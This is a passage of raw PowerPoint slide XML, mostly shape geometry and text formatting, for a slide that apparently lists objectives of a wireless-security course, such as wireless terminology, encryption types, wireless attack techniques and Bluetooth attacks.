        <p:spPr>
          <a:xfrm>
            <a:off x="8782072" y="4207543"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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B9016AFD-5B5A-4813-A53E-5D4C3615CEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578635" y="2476299"/>
            <a:ext cx="2897085" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Different Types of Wireless Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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B14C850-384D-43ED-A074-9D81FF2B7B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9430979" y="4194087"/>
            <a:ext cx="2532421" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Bluetooth Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403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4F181BEB-E04A-42A9-9AC7-2704A1A580BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="496386" y="3264450"/>
            <a:ext cx="3083372" cy="69403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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Network-Specific Attack Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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178D3AB4-6CCD-4627-81A0-952F323A0B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1942730" y="1637194"/>
            <a:ext cx="2418764" cy="61555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 algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Wireless Terminology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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</a:endParaRPr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7CEA977D-F9E3-49EA-AA26-D48AC44B87B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4414470" y="1669051"/>
            <a:ext cx="551839" cy="551839"/>
            <a:chOff x="4150833" y="1613610"/>
            <a:chExt cx="551839" cy="551839"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="106" name="Oval 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4150833" y="1613610"/>
              <a:ext cx="551839" cy="551839"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln w="38100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" name="Freeform 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86753C4D-EE69-4971-84FE-58F31E5B7B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82955" y="1737961"/>
              <a:ext cx="285358" cy="296356"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198438 w 58"/>
                <a:gd name="T1" fmla="*/ 162089 h 58"/>
                <a:gd name="T2" fmla="*/ 160803 w 58"/>
                <a:gd name="T3" fmla="*/ 200025 h 58"/>
                <a:gd name="T4" fmla="*/ 37635 w 58"/>
                <a:gd name="T5" fmla="*/ 200025 h 58"/>
                <a:gd name="T6" fmla="*/ 0 w 58"/>
                <a:gd name="T7" fmla="*/ 162089 h 58"/>
                <a:gd name="T8" fmla="*/ 0 w 58"/>
                <a:gd name="T9" fmla="*/ 34487 h 58"/>
                <a:gd name="T10" fmla="*/ 37635 w 58"/>
                <a:gd name="T11" fmla="*/ 0 h 58"/>
                <a:gd name="T12" fmla="*/ 160803 w 58"/>
                <a:gd name="T13" fmla="*/ 0 h 58"/>
                <a:gd name="T14" fmla="*/ 198438 w 58"/>
                <a:gd name="T15" fmla="*/ 34487 h 58"/>
                <a:gd name="T16" fmla="*/ 198438 w 58"/>
                <a:gd name="T17" fmla="*/ 162089 h 58"/>
                <a:gd name="T18" fmla="*/ 167646 w 58"/>
                <a:gd name="T19" fmla="*/ 72423 h 58"/>
                <a:gd name="T20" fmla="*/ 167646 w 58"/>
                <a:gd name="T21" fmla="*/ 58628 h 58"/>
                <a:gd name="T22" fmla="*/ 153961 w 58"/>
                <a:gd name="T23" fmla="*/ 44833 h 58"/>
                <a:gd name="T24" fmla="*/ 143696 w 58"/>
                <a:gd name="T25" fmla="*/ 44833 h 58"/>
                <a:gd name="T26" fmla="*/ 82112 w 58"/>
                <a:gd name="T27" fmla="*/ 106910 h 58"/>
                <a:gd name="T28" fmla="*/ 54742 w 58"/>
                <a:gd name="T29" fmla="*/ 79320 h 58"/>
                <a:gd name="T30" fmla="*/ 44477 w 58"/>
                <a:gd name="T31" fmla="*/ 79320 h 58"/>
                <a:gd name="T32" fmla="*/ 30792 w 58"/>
                <a:gd name="T33" fmla="*/ 93115 h 58"/>
                <a:gd name="T34" fmla="*/ 30792 w 58"/>
                <a:gd name="T35" fmla="*/ 103461 h 58"/>
                <a:gd name="T36" fmla="*/ 75270 w 58"/>
                <a:gd name="T37" fmla="*/ 151743 h 58"/>
                <a:gd name="T38" fmla="*/ 88955 w 58"/>
                <a:gd name="T39" fmla="*/ 151743 h 58"/>
                <a:gd name="T40" fmla="*/ 167646 w 58"/>
                <a:gd name="T41" fmla="*/ 72423 h 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8" h="58">
                  <a:moveTo>
                    <a:pt x="58" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="53"/>
                    <a:pt x="53" y="58"/>
                    <a:pt x="47" y="58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5" y="58"/>
                    <a:pt x="0" y="53"/>
                    <a:pt x="0" y="4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53" y="0"/>
                    <a:pt x="58" y="4"/>
                    <a:pt x="58" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="20"/>
                    <a:pt x="50" y="18"/>
                    <a:pt x="49" y="17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4" y="12"/>
                    <a:pt x="43" y="12"/>
                    <a:pt x="42" y="13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4" y="22"/>
                    <a:pt x="13" y="23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8"/>
                    <a:pt x="8" y="29"/>
                    <a:pt x="9" y="30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3" y="45"/>
                    <a:pt x="25" y="45"/>
                    <a:pt x="26" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="49" y="2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/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00080F5-AB70-4A18-96ED-06D761FEA3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3729092" y="3468970"/>
            <a:ext cx="354131" cy="303951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 142082 w 178"/>
              <a:gd name="T1" fmla="*/ 0 h 168"/>
              <a:gd name="T2" fmla="*/ 284163 w 178"/>
              <a:gd name="T3" fmla="*/ 60684 h 168"/>
              <a:gd name="T4" fmla="*/ 260217 w 178"/>
              <a:gd name="T5" fmla="*/ 91026 h 168"/>
              <a:gd name="T6" fmla="*/ 142082 w 178"/>
              <a:gd name="T7" fmla="*/ 38327 h 168"/>
              <a:gd name="T8" fmla="*/ 23946 w 178"/>
              <a:gd name="T9" fmla="*/ 91026 h 168"/>
              <a:gd name="T10" fmla="*/ 0 w 178"/>
              <a:gd name="T11" fmla="*/ 60684 h 168"/>
              <a:gd name="T12" fmla="*/ 142082 w 178"/>
              <a:gd name="T13" fmla="*/ 0 h 168"/>
              <a:gd name="T14" fmla="*/ 142082 w 178"/>
              <a:gd name="T15" fmla="*/ 95817 h 168"/>
              <a:gd name="T16" fmla="*/ 225095 w 178"/>
              <a:gd name="T17" fmla="*/ 138934 h 168"/>
              <a:gd name="T18" fmla="*/ 204342 w 178"/>
              <a:gd name="T19" fmla="*/ 166082 h 168"/>
              <a:gd name="T20" fmla="*/ 142082 w 178"/>
              <a:gd name="T21" fmla="*/ 134144 h 168"/>
              <a:gd name="T22" fmla="*/ 79821 w 178"/>
              <a:gd name="T23" fmla="*/ 166082 h 168"/>
              <a:gd name="T24" fmla="*/ 59068 w 178"/>
              <a:gd name="T25" fmla="*/ 138934 h 168"/>
              <a:gd name="T26" fmla="*/ 142082 w 178"/>
              <a:gd name="T27" fmla="*/ 95817 h 168"/>
              <a:gd name="T28" fmla="*/ 142082 w 178"/>
              <a:gd name="T29" fmla="*/ 191634 h 168"/>
              <a:gd name="T30" fmla="*/ 180396 w 178"/>
              <a:gd name="T31" fmla="*/ 229960 h 168"/>
              <a:gd name="T32" fmla="*/ 142082 w 178"/>
              <a:gd name="T33" fmla="*/ 268287 h 168"/>
              <a:gd name="T34" fmla="*/ 103767 w 178"/>
              <a:gd name="T35" fmla="*/ 229960 h 168"/>
              <a:gd name="T36" fmla="*/ 142082 w 178"/>
              <a:gd name="T37" fmla="*/ 191634 h 16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78" h="168">
                <a:moveTo>
                  <a:pt x="89" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="0"/>
                  <a:pt x="156" y="15"/>
                  <a:pt x="178" y="38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45" y="37"/>
                  <a:pt x="119" y="24"/>
                  <a:pt x="89" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="24"/>
                  <a:pt x="33" y="37"/>
                  <a:pt x="15" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="15"/>
                  <a:pt x="54" y="0"/>
                  <a:pt x="89" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="60"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="60"/>
                  <a:pt x="129" y="71"/>
                  <a:pt x="141" y="87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19" y="92"/>
                  <a:pt x="105" y="84"/>
                  <a:pt x="89" y="84"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="84"/>
                  <a:pt x="59" y="92"/>
                  <a:pt x="50" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="71"/>
                  <a:pt x="68" y="60"/>
                  <a:pt x="89" y="60"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="120"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="120"/>
                  <a:pt x="113" y="131"/>
                  <a:pt x="113" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="157"/>
                  <a:pt x="102" y="168"/>
                  <a:pt x="89" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="168"/>
                  <a:pt x="65" y="157"/>
                  <a:pt x="65" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="131"/>
                  <a:pt x="76" y="120"/>
                  <a:pt x="89" y="120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09" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEA836F-6FC0-4F24-B06E-5ADA0E3ACA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281" y="5000730"/>
            <a:ext cx="291473" cy="313875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51370 w 462"/>
              <a:gd name="T1" fmla="*/ 67883 h 452"/>
              <a:gd name="T2" fmla="*/ 83086 w 462"/>
              <a:gd name="T3" fmla="*/ 43607 h 452"/>
              <a:gd name="T4" fmla="*/ 83086 w 462"/>
              <a:gd name="T5" fmla="*/ 31469 h 452"/>
              <a:gd name="T6" fmla="*/ 19655 w 462"/>
              <a:gd name="T7" fmla="*/ 39561 h 452"/>
              <a:gd name="T8" fmla="*/ 51370 w 462"/>
              <a:gd name="T9" fmla="*/ 67883 h 452"/>
              <a:gd name="T10" fmla="*/ 27695 w 462"/>
              <a:gd name="T11" fmla="*/ 87664 h 452"/>
              <a:gd name="T12" fmla="*/ 11614 w 462"/>
              <a:gd name="T13" fmla="*/ 55745 h 452"/>
              <a:gd name="T14" fmla="*/ 15634 w 462"/>
              <a:gd name="T15" fmla="*/ 151051 h 452"/>
              <a:gd name="T16" fmla="*/ 27695 w 462"/>
              <a:gd name="T17" fmla="*/ 87664 h 452"/>
              <a:gd name="T18" fmla="*/ 102741 w 462"/>
              <a:gd name="T19" fmla="*/ 15735 h 452"/>
              <a:gd name="T20" fmla="*/ 154558 w 462"/>
              <a:gd name="T21" fmla="*/ 11688 h 452"/>
              <a:gd name="T22" fmla="*/ 67452 w 462"/>
              <a:gd name="T23" fmla="*/ 3596 h 452"/>
              <a:gd name="T24" fmla="*/ 102741 w 462"/>
              <a:gd name="T25" fmla="*/ 15735 h 452"/>
              <a:gd name="T26" fmla="*/ 134456 w 462"/>
              <a:gd name="T27" fmla="*/ 119582 h 452"/>
              <a:gd name="T28" fmla="*/ 110781 w 462"/>
              <a:gd name="T29" fmla="*/ 59342 h 452"/>
              <a:gd name="T30" fmla="*/ 91127 w 462"/>
              <a:gd name="T31" fmla="*/ 55745 h 452"/>
              <a:gd name="T32" fmla="*/ 71472 w 462"/>
              <a:gd name="T33" fmla="*/ 87664 h 452"/>
              <a:gd name="T34" fmla="*/ 134456 w 462"/>
              <a:gd name="T35" fmla="*/ 119582 h 452"/>
              <a:gd name="T36" fmla="*/ 162152 w 462"/>
              <a:gd name="T37" fmla="*/ 147005 h 452"/>
              <a:gd name="T38" fmla="*/ 162152 w 462"/>
              <a:gd name="T39" fmla="*/ 182970 h 452"/>
              <a:gd name="T40" fmla="*/ 174213 w 462"/>
              <a:gd name="T41" fmla="*/ 135317 h 452"/>
              <a:gd name="T42" fmla="*/ 130436 w 462"/>
              <a:gd name="T43" fmla="*/ 135317 h 452"/>
              <a:gd name="T44" fmla="*/ 63431 w 462"/>
              <a:gd name="T45" fmla="*/ 107444 h 452"/>
              <a:gd name="T46" fmla="*/ 47797 w 462"/>
              <a:gd name="T47" fmla="*/ 107444 h 452"/>
              <a:gd name="T48" fmla="*/ 63431 w 462"/>
              <a:gd name="T49" fmla="*/ 195108 h 452"/>
              <a:gd name="T50" fmla="*/ 170192 w 462"/>
              <a:gd name="T51" fmla="*/ 23827 h 452"/>
              <a:gd name="T52" fmla="*/ 122842 w 462"/>
              <a:gd name="T53" fmla="*/ 35515 h 452"/>
              <a:gd name="T54" fmla="*/ 122842 w 462"/>
              <a:gd name="T55" fmla="*/ 47653 h 452"/>
              <a:gd name="T56" fmla="*/ 174213 w 462"/>
              <a:gd name="T57" fmla="*/ 119582 h 452"/>
              <a:gd name="T58" fmla="*/ 205928 w 462"/>
              <a:gd name="T59" fmla="*/ 99352 h 452"/>
              <a:gd name="T60" fmla="*/ 142497 w 462"/>
              <a:gd name="T61" fmla="*/ 147005 h 452"/>
              <a:gd name="T62" fmla="*/ 79066 w 462"/>
              <a:gd name="T63" fmla="*/ 199154 h 452"/>
              <a:gd name="T64" fmla="*/ 146517 w 462"/>
              <a:gd name="T65" fmla="*/ 195108 h 452"/>
              <a:gd name="T66" fmla="*/ 146517 w 462"/>
              <a:gd name="T67" fmla="*/ 151051 h 45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62" h="452">
                <a:moveTo>
                  <a:pt x="115" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="115" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="132"/>
                  <a:pt x="160" y="115"/>
                  <a:pt x="186" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="186" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="53"/>
                  <a:pt x="133" y="44"/>
                  <a:pt x="107" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="44"/>
                  <a:pt x="62" y="62"/>
                  <a:pt x="44" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="115"/>
                  <a:pt x="71" y="132"/>
                  <a:pt x="89" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="151"/>
                  <a:pt x="107" y="151"/>
                  <a:pt x="115" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="186"/>
                  <a:pt x="62" y="186"/>
                  <a:pt x="71" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="160"/>
                  <a:pt x="35" y="141"/>
                  <a:pt x="26" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="151"/>
                  <a:pt x="0" y="186"/>
                  <a:pt x="0" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="266"/>
                  <a:pt x="9" y="310"/>
                  <a:pt x="35" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="301"/>
                  <a:pt x="54" y="257"/>
                  <a:pt x="71" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="221"/>
                  <a:pt x="62" y="204"/>
                  <a:pt x="62" y="195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="230" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="35"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="35"/>
                  <a:pt x="257" y="44"/>
                  <a:pt x="266" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="35"/>
                  <a:pt x="319" y="35"/>
                  <a:pt x="346" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="8"/>
                  <a:pt x="275" y="0"/>
                  <a:pt x="230" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="0"/>
                  <a:pt x="177" y="0"/>
                  <a:pt x="151" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="17"/>
                  <a:pt x="186" y="35"/>
                  <a:pt x="204" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="44"/>
                  <a:pt x="221" y="35"/>
                  <a:pt x="230" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="301" y="266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="301" y="266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="257"/>
                  <a:pt x="310" y="257"/>
                  <a:pt x="319" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="204"/>
                  <a:pt x="275" y="168"/>
                  <a:pt x="248" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="132"/>
                  <a:pt x="239" y="132"/>
                  <a:pt x="230" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="132"/>
                  <a:pt x="213" y="132"/>
                  <a:pt x="204" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="141"/>
                  <a:pt x="168" y="151"/>
                  <a:pt x="151" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="177"/>
                  <a:pt x="160" y="186"/>
                  <a:pt x="160" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="239"/>
                  <a:pt x="248" y="257"/>
                  <a:pt x="301" y="266"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="363" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="363" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="336"/>
                  <a:pt x="363" y="354"/>
                  <a:pt x="363" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="372"/>
                  <a:pt x="363" y="389"/>
                  <a:pt x="363" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="380"/>
                  <a:pt x="434" y="336"/>
                  <a:pt x="443" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="301"/>
                  <a:pt x="408" y="301"/>
                  <a:pt x="390" y="301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="319"/>
                  <a:pt x="381" y="327"/>
                  <a:pt x="363" y="327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="292" y="301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="292"/>
                  <a:pt x="186" y="266"/>
                  <a:pt x="142" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="239"/>
                  <a:pt x="124" y="248"/>
                  <a:pt x="115" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="283"/>
                  <a:pt x="71" y="327"/>
                  <a:pt x="62" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="398"/>
                  <a:pt x="115" y="425"/>
                  <a:pt x="142" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="380"/>
                  <a:pt x="230" y="327"/>
                  <a:pt x="292" y="301"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="381" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="62"/>
                  <a:pt x="310" y="70"/>
                  <a:pt x="275" y="79"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="97"/>
                  <a:pt x="275" y="97"/>
                  <a:pt x="275" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="141"/>
                  <a:pt x="328" y="186"/>
                  <a:pt x="346" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="239"/>
                  <a:pt x="381" y="248"/>
                  <a:pt x="390" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="266"/>
                  <a:pt x="434" y="266"/>
                  <a:pt x="452" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="248"/>
                  <a:pt x="461" y="230"/>
                  <a:pt x="461" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="160"/>
                  <a:pt x="426" y="97"/>
                  <a:pt x="381" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="319" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="319" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="354"/>
                  <a:pt x="213" y="389"/>
                  <a:pt x="177" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="451"/>
                  <a:pt x="213" y="451"/>
                  <a:pt x="230" y="451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="451"/>
                  <a:pt x="292" y="443"/>
                  <a:pt x="328" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="407"/>
                  <a:pt x="337" y="380"/>
                  <a:pt x="337" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337" y="354"/>
                  <a:pt x="337" y="345"/>
                  <a:pt x="328" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="327"/>
                  <a:pt x="319" y="327"/>
                  <a:pt x="319" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854E4B31-FC87-4904-AF59-18E894A73CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8923113" y="4301357"/>
            <a:ext cx="275459" cy="336378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 226881 w 144"/>
              <a:gd name="T1" fmla="*/ 129977 h 256"/>
              <a:gd name="T2" fmla="*/ 226881 w 144"/>
              <a:gd name="T3" fmla="*/ 129977 h 256"/>
              <a:gd name="T4" fmla="*/ 150714 w 144"/>
              <a:gd name="T5" fmla="*/ 207963 h 256"/>
              <a:gd name="T6" fmla="*/ 226881 w 144"/>
              <a:gd name="T7" fmla="*/ 285948 h 256"/>
              <a:gd name="T8" fmla="*/ 233363 w 144"/>
              <a:gd name="T9" fmla="*/ 298946 h 256"/>
              <a:gd name="T10" fmla="*/ 226881 w 144"/>
              <a:gd name="T11" fmla="*/ 311944 h 256"/>
              <a:gd name="T12" fmla="*/ 129646 w 144"/>
              <a:gd name="T13" fmla="*/ 409426 h 256"/>
              <a:gd name="T14" fmla="*/ 116682 w 144"/>
              <a:gd name="T15" fmla="*/ 415925 h 256"/>
              <a:gd name="T16" fmla="*/ 97235 w 144"/>
              <a:gd name="T17" fmla="*/ 396429 h 256"/>
              <a:gd name="T18" fmla="*/ 97235 w 144"/>
